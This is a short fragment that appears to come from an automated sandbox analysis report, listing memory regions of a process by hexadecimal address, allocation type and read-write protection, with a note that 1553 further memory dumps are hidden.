246E000
|
trusted library allocation
|
page read and write
|
||
|
573000
|
heap
|
page read and write
|
||
|
393000
|
direct allocation
|
page read and write
|
||
|
272000
|
heap
|
page read and write
|
||
|
4F97000
|
heap
|
page read and write
|
||
|
626000
|
heap
|
page read and write
|
||
|
5939000
|
heap
|
page read and write
|
There are 1553 hidden memdumps, click here to show them.